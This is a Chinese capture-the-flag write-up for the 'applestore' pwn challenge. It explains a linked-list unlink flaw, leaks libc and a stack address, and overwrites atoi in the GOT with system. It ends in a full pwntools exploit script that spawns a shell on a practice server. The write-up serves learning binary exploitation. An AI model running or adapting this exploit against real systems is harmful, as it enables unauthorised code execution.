pwnable_applestore

pwnable_applestore

checksec

checksec

IDA

addinsert可以逆向出每一个设备的结构体

typedef struct shop
{
    char *name;
    int price;
    Shop *bk;
    Shop *fd;
}Shop,PShop

delete

......  
while ( item )
  {
    if ( v1 == idx )
    {
      BK = item->bk;
      FD = item->fd;
      if ( FD )
        FD->bk = BK;
      if ( BK )
        BK->fd = FD;
      printf("Remove %d:%s from your shopping cart.\n", v1, item->Name);
      return __readgsdword(0x14u) ^ v7;
    }
    ++v1;
    item = item->bk;
  }
.......

这功能是把chunk从item双链中取出,但是只校验了FD、BK的存在,没有校验合理性,如果我们可以控制 Itemfd、bk,就能实现 unlink 的效果

栈内变量覆盖

那么如何控制fd、bk

checkout

  v4 = __readgsdword(0x14u);
  total = cart();
  if ( total == 7174 )
  {
    puts("*: iPhone 8 - $1");
    asprintf(&a1, "%s", "iPhone 8");
    a1_4 = 1;
    insert(&a1);
    total = 7175;
  }
  printf("Total: $%d\n", total);
  puts("Want to checkout? Maybe next time!");

我们回顾add,发现每一个 item 都是以堆的方式存在双链表中,而当总价为7174时,会赠送price为1的item,而这个item是在栈上面的,但是如何实现栈的修改呢?

有两个可以利用的漏洞点

  • Cart
int cart()
{
  signed int j; // eax
  signed int counter; // [esp+18h] [ebp-30h]
  int total; // [esp+1Ch] [ebp-2Ch]
  Shop *I; // [esp+20h] [ebp-28h]
  char buf; // [esp+26h] [ebp-22h]
  unsigned int v6; // [esp+3Ch] [ebp-Ch]

  v6 = __readgsdword(0x14u);
  counter = 1;
  total = 0;
  printf("Let me check your cart. ok? (y/n) > ");
  fflush(stdout);
  my_read(&buf, 0x15u);
  if ( buf == 'y' )
  {
    puts("==== Cart ====");
    for ( I = item_804B070; I; I = I->bk )
    {
      j = counter++;
      printf("%d: %s - $%d\n", j, I->Name, I->price);
      total += I->price;
    }
  }
  return total;
}

这里看上去没问题,但是我们仔细在栈帧上看

stack

这样就控制了 fd、bk

泄露libc

然后我们就想泄露libc

Cart里面会输出当前所有的Item,而之前我们已经可以控制 itemfdbk,那先换为 atoi@got,这样去泄露

因为程序是 Partial RELRO ,所以可以覆盖got表实现getshell

如何得到7174

这个穷举也可

total = 0
counter = 1
while 1:
    total += 199*counter
    if (7174-total)%299==0:
        print counter
        print (7174-total)/299
        break
    total = 0
    counter+=1

6个item_1,20个item_2

思路

  • 控制 itemfdbk,那先换为 atoi@got,泄露libc
  • delete Item->fd=aoti-8,Item->bk=system,将atoi换为system
  • getshell

但是控制 itemfdbk的机会只有一次,无法完成填入system的参数,后面看Writeup才知道还有一种方法

可以通过libc中的environ来泄露栈地址, 泄露了栈地址后通过调试算出偏移可以得到delete函数的ebp地址,delete函数中的ebp指向的是handler函数中的ebp
ebp -> handler_ebp

可以通过改写handler_ebp 为got_atoi + 0x22来完成对got表的覆写

从delete函数返回到handler函数中, 还原栈帧的过程中ebp 的值为改写成got_atoi - 0x22, 这样在调用my_read 函数中时可以对got_atoi 进行覆写, 改写了got表后要考虑的就是/bin/sh 的位置, 可以看到atoi 的参数就是刚刚输入的数据, 这时可以输入p32(system) + "|| /bin/sh"或 p32(system) + “;/bin/sh” 来绕过system 调用/bin/sh
————————————————
版权声明:本文为CSDN博主「苍崎青子」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_43189757/article/details/102850665

这里再强调几个概念:

EBP:栈底指针该寄存器

ESP:栈顶指针寄存器

程序运行时栈地收缩或扩张,也就是ebp和esp的增大或减小

当我们delete结束时,返回到handle,当handle恢复栈时,假设再返回时我们把ebp变成了 atoi@got+0x22

此时的栈

image

利用EBP收缩让 atoi@got+0x22变为handle的EBP,然后泄露environ来计算栈的地址来修复

我们构造的

change atoi

这个时候atoi@got立马变成system,执行system("SYS_ADDR||/bin/sh;"),从而getshell

EXP

from pwn import *
import sys

name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
# libc = ELF("libc-2.23.so")
sh = 0

l64 = lambda      :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :sh.sendlineafter(str(a),str(b))
sa  = lambda a,b  :sh.sendafter(str(a),str(b))
lg  = lambda name,data : sh.success(name + ": 0x%x" % data)
se  = lambda payload: sh.send(payload)
rl  = lambda      : sh.recv()
sl  = lambda payload: sh.sendline(payload)
ru  = lambda a     :sh.recvuntil(str(a))

def cmd(ch):
    sla("> ",ch)

def List():
    cmd(1)

def Add(kind):
    cmd(2)
    sla("Device Number> ",kind)

def free(idx):
    cmd(3)
    sla("Item Number> ",idx)

def Cart(payload):
    cmd(4)
    sla("Let me check your cart. ok? (y/n) > ",payload)

def checkout(payload):
    cmd(5)
    sla("Let me check your cart. ok? (y/n) > ",payload)


def main(ip,port,debug,mode):
    global sh
    if debug==0:
        context.log_level = "debug"
    else:
        pass
    if mode==0:
        sh = process(name)
    else:
        sh = remote(ip,port)
    for i in range(6):
        Add("1")
    for i in range(20):
        Add("2")

    checkout("y")
    Cart("ya"+p32(elf.got["atoi"])+p32(0))

    libcbase = u32(ru("\xf7")[-4:])-libc.sym["atoi"]
    environ = libcbase + libc.sym["environ"]
    system = libcbase + libc.sym["system"]
    lg("libcbase",libcbase)
    lg("environ",environ)
    lg("system",system)
    
    Cart('ya' + p32(environ)+ p32(0))
    ru("27: ")
    stack = u32(sh.recv(4))
    lg("stack",stack)
    payload = '27' + p32(0) + p32(0)
    payload += p32(elf.got["atoi"] + 0x22) + p32(stack - 0x100 - 0xc)
    free(payload)
    sla("> ", p32(system) + "||/bin/sh")
    sh.interactive()

if __name__ == '__main__':
    main("node3.buuoj.cn","25844",0,0)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,830评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,992评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,875评论 0 331
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,837评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,734评论 5 360
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,091评论 1 277
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,550评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,217评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,368评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,298评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,350评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,027评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,623评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,706评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,940评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,349评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,936评论 2 341

推荐阅读更多精彩内容

  • 0x00 程序分析 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:cha...
    BJChangAn阅读 467评论 0 0
  • applestore 首先看下安全机制,没有开启pie,可能要使用到程序中的某个地址: ​ 大概运行了程序后,...
    Nevv阅读 804评论 0 0
  • 0x01 fd 文件描述符 0、1、2分别代表标准输入、标准输出和标准错误,所以输入0x1234的十进制值,再次...
    Nevv阅读 5,820评论 0 6
  • 新手练习 CGfsb 简单的格式化字符串 get_shell nc 上去直接 cat flag hello_pwn...
    Nevv阅读 3,243评论 0 6
  • 夜莺2517阅读 127,706评论 1 9